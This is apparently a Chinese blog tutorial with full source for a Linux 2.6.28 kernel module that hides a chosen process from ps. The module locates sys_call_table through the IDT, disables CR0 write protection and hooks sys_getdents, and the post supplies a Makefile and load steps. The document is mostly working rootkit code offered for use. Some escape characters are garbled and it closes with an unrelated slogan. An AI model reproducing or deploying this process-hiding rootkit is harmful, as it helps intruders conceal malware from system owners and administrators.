
网上很多类似的文章,其中很多示例程序都是在比较老的内核版本上测试过,很多在新的内核下根本无法运行,我收集了一些相关的资料,并给出一个在linux内核2.6.28(ubuntu9.04)上可以运行的程序代码.相比其他一些文章,修改如下:1.增加了两个函数,清CR0的第20位,不然在替换sys_call_table的时候会报段错误.unsigned int clear_and_return_cr0(void);void setback_cr0(unsigned int val);2.针对ubuntu9.04中,ps命令用的系统调用是sys_getdents,不是sys_getdents64(在suse系统里面用的是sys_getdents64),所以程序中劫持的是sys_getdents的系统调用.关于隐藏进程的原理,可以查看其他相关文章,主要是通过int 0x80 找sys_call_table的地址.测试环境: ubuntu9.04 内核版本2.6.28模块代码如下:/*hideps.c*/#include <linux/module.h>#include <linux/kernel.h>#include <asm/unistd.h>#include <linux/types.h>#include <linux/sched.h>#include <linux/dirent.h>#include <linux/string.h>#include <linux/file.h>#include <linux/fs.h>#include <linux/list.h>#include <asm/uaccess.h>#include <linux/unistd.h>//#include <sys/stat.h>//#include <fcntl.h>#define CALLOFF 100//使用模块参数来定义需要隐藏的进程名int orig_cr0;char psname[10]=”looptest”;char *processname=psname;//module_param(processname, charp, 0);struct { unsigned short limit; unsigned int base;} __attribute__ ((packed)) idtr;struct { unsigned short off1; unsigned short sel; unsigned char none,flags; unsigned short off2;} __attribute__ ((packed)) * idt;struct linux_dirent{ unsigned long d_ino; unsigned long d_off; unsigned short d_reclen; char d_name[1];};void** sys_call_table;unsigned int clear_and_return_cr0(void){ unsigned int cr0 = 0; unsigned int ret; asm volatile (“movl %%cr0, %%eax” : “=a”(cr0) ); ret = cr0; /*clear the 20th bit of CR0,*/ cr0 &= 0xfffeffff; asm volatile (“movl %%eax, %%cr0” : : “a”(cr0) ); return ret;}void setback_cr0(unsigned int val){ asm volatile (“movl %%eax, %%cr0” : : “a”(val) );}asmlinkage long (*orig_getdents)(unsigned int fd, struct linux_dirent __user *dirp, unsigned int count);char * findoffset(char *start){ char *p; for (p = start; p < start + CALLOFF; p++) if (*(p + 0) == ‘/xff’ && *(p + 1) == ‘/x14’ && *(p + 2) == ‘/x85’) return p; return NULL;}int myatoi(char *str){ int res = 0; int mul = 1; char *ptr; for (ptr = str + strlen(str) – 1; ptr >= str; ptr–) { if (*ptr < ‘0’ || *ptr > ‘9’) return (-1); res += (*ptr – ‘0’) * mul; mul *= 10; } if(res>0 && res< 9999) printk(KERN_INFO “pid=%d,”,res); printk(“/n”); return (res);}struct task_struct *get_task(pid_t pid){ struct task_struct *p = get_current(),*entry=NULL; list_for_each_entry(entry,&(p->tasks),tasks) { if(entry->pid == pid) { printk(“pid found=%d/n”,entry->pid); return entry; } else { // printk(KERN_INFO “pid=%d not found/n”,pid); } } return NULL;}static inline char *get_name(struct task_struct *p, char *buf){ int i; char *name; name = p->comm; i = sizeof(p->comm); do { unsigned char c = *name; name++; i–; *buf = c; if (!c) break; if (c == ‘//’) { buf[1] = c; buf += 2; continue; } if (c == ‘/n’) { buf[0] = ‘//’; buf[1] = ‘n’; buf += 2; continue; } buf++; } while (i); *buf = ‘/n’; return buf + 1;}int get_process(pid_t pid){ struct task_struct *task = get_task(pid); // char *buffer[64] = {0}; char buffer[64]; if (task) { get_name(task, buffer); // if(pid>0 && pid<9999) // printk(KERN_INFO “task name=%s/n”,*buffer); if(strstr(buffer,processname)) return 1; else return 0; } else return 0;}asmlinkage long hacked_getdents(unsigned int fd, struct linux_dirent __user *dirp, unsigned int count){ //added by lsc for process long value; // struct inode *dinode; unsigned short len = 0; unsigned short tlen = 0;// struct linux_dirent *mydir = NULL;//end //在这里调用一下sys_getdents,得到返回的结果 value = (*orig_getdents) (fd, dirp, count); tlen = value; //遍历得到的目录列表 while(tlen > 0) { len = dirp->d_reclen; tlen = tlen – len; printk(“%s/n”,dirp->d_name); if(get_process(myatoi(dirp->d_name)) ) { printk(“find process/n”); //发现匹配的进程,调用memmove将这条进程覆盖掉 memmove(dirp, (char *) dirp + dirp->d_reclen, tlen); value = value – len; printk(KERN_INFO “hide successful./n”); } if(tlen) dirp = (struct linux_dirent *) ((char *)dirp + dirp->d_reclen); } printk(KERN_INFO “finished hacked_getdents./n”); return value;}void **get_sct_addr(void){ unsigned sys_call_off; unsigned sct = 0; char *p; asm(“sidt %0”:”=m”(idtr)); idt = (void *) (idtr.base + 8 * 0x80); sys_call_off = (idt->off2 << 16) | idt->off1; if ((p = findoffset((char *) sys_call_off))) sct = *(unsigned *) (p + 3); return ((void **)sct);}static int filter_init(void){ //得到sys_call_table的偏移地址 sys_call_table = get_sct_addr(); if (!sys_call_table) { printk(“get_act_addr(): NULL…/n”); return 0; } else printk(“sct: 0x%x/n”, (unsigned int)sys_call_table); //将sys_call_table中注册的系统调用sys_getdents替换成我们自己的函数hack_getdents orig_getdents = sys_call_table[__NR_getdents]; orig_cr0 = clear_and_return_cr0(); sys_call_table[__NR_getdents] = hacked_getdents; setback_cr0(orig_cr0); printk(KERN_INFO “hideps: module loaded./n”); return 0;}static void filter_exit(void){ orig_cr0 = clear_and_return_cr0(); if (sys_call_table) sys_call_table[__NR_getdents] = orig_getdents; setback_cr0(orig_cr0); printk(KERN_INFO “hideps: module removed/n”);}module_init(filter_init);module_exit(filter_exit);MODULE_LICENSE(“GPL”);makefile文件如下:obj-m :=hideps.oEXTRA_CFLAGS := -Dsymname=sys_call_tableKDIR := /lib/modules/$(shell uname -r)/buildPWD := $(shell pwd)default: $(MAKE) -C $(KDIR) SUBDIRS=$(PWD) modulesclean: $(RM) -rf .*.cmd *.mod.c *.o *.ko .tmp*编写一个测试程序looptest.c,如下:#include<stdio.h>int main(void){ while(1); return 0;}编译该测试程序,#gcc looptest.c -o looptest并将该程序在后台运行,然后insmod 驱动模块hideps.ko,然后输入ps查看进程,可发现,looptest进程看不到了…. 明天是世上增值最快的一块土地,因它充满了希望



